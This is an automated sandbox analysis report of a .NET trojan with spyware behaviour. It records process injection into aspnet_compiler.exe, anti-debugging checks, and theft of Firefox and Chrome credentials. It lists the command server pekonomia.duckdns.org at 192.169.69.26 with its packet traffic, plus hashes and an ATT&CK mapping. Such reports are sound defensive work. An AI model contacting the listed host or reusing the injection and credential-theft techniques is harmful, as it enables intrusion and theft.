              Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@3/1@68/1
              Source: file.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
              Source: C:\Users\user\Desktop\file.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004195A5 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,2_2_004195A5
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040E991 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CreateMutexA,CloseHandle,2_2_0040E991
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-B0VP4N
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041A003 FindResourceA,LoadResource,LockResource,SizeofResource,2_2_0041A003
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
              Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: CEMENT.pdb source: file.exe, 00000001.00000002.555430907.0000018FF8E60000.00000004.08000000.00040000.00000000.sdmp, file.exe, 00000001.00000002.550087026.0000018F8008D000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: NBB872.pdb source: file.exe

              Data Obfuscation

              Source: file.exe, A/cfe605753591ecefb0de5afddfaa74037.cs.Net Code: c1675bf00bf077c2c9cbaa9d027c7d40f System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00456328 push eax; ret 2_2_00456346
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0045C51D push esi; ret 2_2_0045C526
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433746 push ecx; ret 2_2_00433759
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00455A06 push ecx; ret 2_2_00455A19
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041B4C9 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,2_2_0041B4C9
              Source: initial sampleStatic PE information: section name: .text entropy: 7.966829562881022
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00406524 ShellExecuteW,URLDownloadToFileW,2_2_00406524
              Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040ECEA Sleep,ExitProcess,2_2_0040ECEA
              Source: C:\Users\user\Desktop\file.exe TID: 3300Thread sleep time: -922337203685477s >= -30000sJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_004192A3
              Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI coverage: 8.9 %
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0044D0F9 FindFirstFileExA,2_2_0044D0F9
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B0AA FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B2B1 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040B2B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418650 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00418650
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040B8C7 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040B8C7
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408909 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408909
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041AC0A FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041AC0A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00408D1B __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00408D1B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00407E80 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_00407E80
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00406EB0 FindFirstFileW,FindNextFileW,2_2_00406EB0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0040730B SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_0040730B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeAPI call chain: ExitProcess graph end nodegraph_2-47741
              Source: aspnet_compiler.exe, 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433304 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00433304
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00411241 SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,2_2_00411241
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00441B85 mov eax, dword ptr fs:[00000030h]2_2_00441B85
              Source: C:\Users\user\Desktop\file.exeMemory allocated: page read and write | page guardJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00433452 SetUnhandledExceptionFilter,2_2_00433452
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043A3F1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043A3F1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_004338CC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_004338CC

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 401000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 457000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 46F000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 475000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 476000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 477000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 47C000
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 10E4008
              Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 protect: page execute and read and write
              Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe base: 400000 value starts with: 4D5A
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_0041163A
              Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00418186 mouse_event,2_2_00418186
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\Users\user\Desktop\file.exe VolumeInformationJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,2_2_0044716D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00450558
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_004507D0
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_0045081B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_004508B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00450943
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,2_2_00450B93
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: EnumSystemLocalesW,2_2_00446C84
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00450CBC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoW,2_2_00450DC3
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetLocaleInfoA,2_2_0040EE14
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00450E90
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0043354D cpuid 2_2_0043354D
              Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00404F31 GetLocalTime,CreateEventA,CreateThread,2_2_00404F31
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_00447A10 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,2_2_00447A10
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 2_2_0041A168 GetUserNameW,2_2_0041A168

              Stealing of Sensitive Information

              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ 2_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \key3.db 2_2_0040B0AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data 2_2_0040AF8C

              Remote Access Functionality

              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 1.2.file.exe.18f92636a68.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.813061315.00000000013F7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000001.00000002.550296982.0000018F91E43000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 6804, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: aspnet_compiler.exe PID: 6588, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: cmd.exe 2_2_0040567A
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid Accounts1
              Native API
              1
              Windows Service
              1
              Bypass User Access Control
              1
              Disable or Modify Tools
              1
              OS Credential Dumping
              2
              System Time Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium11
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default Accounts1
              Command and Scripting Interpreter
              Boot or Logon Initialization Scripts1
              Access Token Manipulation
              1
              Deobfuscate/Decode Files or Information
              11
              Input Capture
              1
              Account Discovery
              Remote Desktop Protocol11
              Input Capture
              Exfiltration Over Bluetooth2
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain Accounts2
              Service Execution
              Logon Script (Windows)1
              Windows Service
              3
              Obfuscated Files or Information
              2
              Credentials In Files
              1
              System Service Discovery
              SMB/Windows Admin Shares12
              Clipboard Data
              Automated Exfiltration1
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)321
              Process Injection
              12
              Software Packing
              NTDS2
              File and Directory Discovery
              Distributed Component Object ModelInput CaptureScheduled Transfer21
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
              Bypass User Access Control
              LSA Secrets33
              System Information Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common1
              Masquerading
              Cached Domain Credentials21
              Security Software Discovery
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items21
              Virtualization/Sandbox Evasion
              DCSync21
              Virtualization/Sandbox Evasion
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job1
              Access Token Manipulation
              Proc Filesystem1
              Process Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
              Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)321
              Process Injection
              /etc/passwd and /etc/shadow1
              System Owner/User Discovery
              Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
              Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
              Remote System Discovery
              Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
              Source | Detection | Scanner | Label | Link
              file.exe | 24% | ReversingLabs | ByteCode-MSIL.Trojan.Generic |
              file.exe | 32% | Virustotal | | Browse
              file.exe | 100% | Avira | HEUR/AGEN.1326434 |
              file.exe | 100% | Joe Sandbox ML | |
              No Antivirus matches
              No Antivirus matches
              Source | Detection | Scanner | Label | Link
              pekonomia.duckdns.org | 7% | Virustotal | | Browse

              Source | Detection | Scanner | Label | Link
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
              http://geoplugin.net/json.gp | 0% | URL Reputation | safe |
              http://geoplugin.net/json.gp/C | 0% | URL Reputation | safe |
              pekonomia.duckdns.org | 7% | Virustotal | | Browse
              pekonomia.duckdns.org | 100% | Avira URL Cloud | malware |

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              pekonomia.duckdns.org | 192.169.69.26 | true | true | | unknown

              Name | Malicious | Antivirus Detection | Reputation
              pekonomia.duckdns.org | true | 7%, Virustotal, Browse; Avira URL Cloud: malware | unknown

              Name | Source | Malicious | Antivirus Detection | Reputation
              http://geoplugin.net/json.gp | aspnet_compiler.exe | false | URL Reputation: safe; URL Reputation: safe | unknown
              http://geoplugin.net/json.gp/C | file.exe, 00000001.00000002.550296982.0000018F9283E000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 00000002.00000002.812919702.0000000000400000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
              192.169.69.26 | pekonomia.duckdns.org | United States | | 23033 | WOWUS | true
              Joe Sandbox Version:37.1.0 Beryl
              Analysis ID:882711
              Start date and time:2023-06-06 17:22:07 +02:00
              Joe Sandbox Product:CloudBasic
              Overall analysis duration:0h 9m 3s
              Hypervisor based Inspection enabled:false
              Report type:full
              Cookbook file name:default.jbs
              Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
              Number of analysed new started processes analysed:3
              Number of new started drivers analysed:0
              Number of existing processes analysed:0
              Number of existing drivers analysed:0
              Number of injected processes analysed:0
              Technologies:
              • HCA enabled
              • EGA enabled
              • HDC enabled
              • AMSI enabled
              Analysis Mode:default
              Analysis stop reason:Timeout
              Sample file name:file.exe
              Detection:MAL
              Classification:mal100.troj.spyw.expl.evad.winEXE@3/1@68/1
              EGA Information:
              • Successful, ratio: 100%
              HDC Information:
              • Successful, ratio: 87.2% (good quality ratio 82.6%)
              • Quality average: 83.5%
              • Quality standard deviation: 26.7%
              HCA Information:
              • Successful, ratio: 98%
              • Number of executed functions: 41
              • Number of non-executed functions: 207
              Cookbook Comments:
              • Found application associated with file extension: .exe
              • Exclude process from analysis (whitelisted): audiodg.exe
              • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
              • Report size getting too big, too many NtDeviceIoControlFile calls found.
              No simulations
              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
              Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
              No context
              No context
              Process:C:\Users\user\Desktop\file.exe
              File Type:CSV text
              Category:dropped
              Size (bytes):226
              Entropy (8bit):5.354940450065058
              Encrypted:false
              SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2wlAsDZiIv:Q3La/KDLI4MWuPTxAIv
              MD5:B10E37251C5B495643F331DB2EEC3394
              SHA1:25A5FFE4C2554C2B9A7C2794C9FE215998871193
              SHA-256:8A6B926C70F8DCFD915D68F167A1243B9DF7B9F642304F570CE584832D12102D
              SHA-512:296BC182515900934AA96E996FC48B565B7857801A07FEFA0D3D1E0C165981B266B084E344DB5B53041D1171F9C6708B4EE0D444906391C4FC073BCC23B92C37
              Malicious:true
              Reputation:high, very likely benign file
              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\10a17139182a9efd561f01fada9688a5\System.ni.dll",0..
              File type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
              Entropy (8bit):7.962338247780781
              TrID:
              • Win64 Executable GUI Net Framework (217006/5) 49.88%
              • Win64 Executable GUI (202006/5) 46.43%
              • Win64 Executable (generic) (12005/4) 2.76%
              • Generic Win/DOS Executable (2004/3) 0.46%
              • DOS Executable Generic (2002/1) 0.46%
              File name:file.exe
              File size:500224
              MD5:66108176e22e6f9513a62c76f2185468
              SHA1:a05e217104b39485fbb4ce3cda9cb65b20960ccb
              SHA256:e1eb3fe18ad660415f59eaac2c768afa1b20e07f107dfc207da8b0880a888aaf
              SHA512:646233ba810efba1ab506041d44d698590e30c88ce22f258fcb7eb8ef4435866fb9d7ca1f8d1067c7805c0275c63c690ca98a4b1efbf635fc7b3df8f8f9ca243
              SSDEEP:12288:oeV56CrxH8gnW6yhQNmPLXWu38n4RQgsAlVF+LpnN7TihIHVQMfT:deCrxsvh/Wusn4RHZvF+lnd/
              TLSH:F7B4129CBB1079CFC897D630AA880C28AA94B437970BC343B497255E9A1D2CFCF555E7
              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......d..............0.................. ....@...... ....................................`...@......@............... .....
              Icon Hash:90cececece8e8eb0
              Entrypoint:0x400000
              Entrypoint Section:
              Digitally signed:false
              Imagebase:0x400000
              Subsystem:windows gui
              Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE
              DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
              Time Stamp:0x647F07F4 [Tue Jun 6 10:18:28 2023 UTC]
              TLS Callbacks:
              CLR (.Net) Version:
              OS Version Major:4
              OS Version Minor:0
              File Version Major:4
              File Version Minor:0
              Subsystem Version Major:4
              Subsystem Version Minor:0
              Import Hash:
              Instruction
              dec ebp
              pop edx
              nop
              add byte ptr [ebx], al
              add byte ptr [eax], al
              add byte ptr [eax+eax], al
              add byte ptr [eax], al
              Name | Virtual Address | Virtual Size | Is in Section
              IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x7c000 | 0x596 | .rsrc
              IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DEBUG | 0x7b7c4 | 0x1c | .text
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2000 | 0x48 | .text
              IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
              Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
              .text | 0x2000 | 0x79803 | 0x79a00 | False | 0.9617564876670093 | data | 7.966829562881022 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rsrc | 0x7c000 | 0x596 | 0x600 | False | 0.416015625 | data | 4.0776365849895475 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              Name | RVA | Size | Type | Language | Country
              RT_VERSION | 0x7c0a0 | 0x30c | data
              RT_MANIFEST | 0x7c3ac | 0x1ea | XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Jun 6, 2023 17:24:52.920059919 CEST3086149748192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:52.920166969 CEST4974830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:52.926160097 CEST4974830861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:53.235061884 CEST3086149748192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:54.281557083 CEST4974930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:54.655350924 CEST3086149749192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:54.655930996 CEST4974930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:54.662023067 CEST4974930861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:54.952296019 CEST3086149749192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:55.994157076 CEST4975030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:56.273822069 CEST3086149750192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:56.274104118 CEST4975030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:56.284198046 CEST4975030861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:56.738667965 CEST3086149750192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:57.784828901 CEST4975130861192.168.2.4192.169.69.26
              Jun 6, 2023 17:24:58.061820030 CEST3086149751192.169.69.26192.168.2.4
              Jun 6, 2023 17:24:58.062114000 CEST4975130861192.168.2.4192.169.69.26
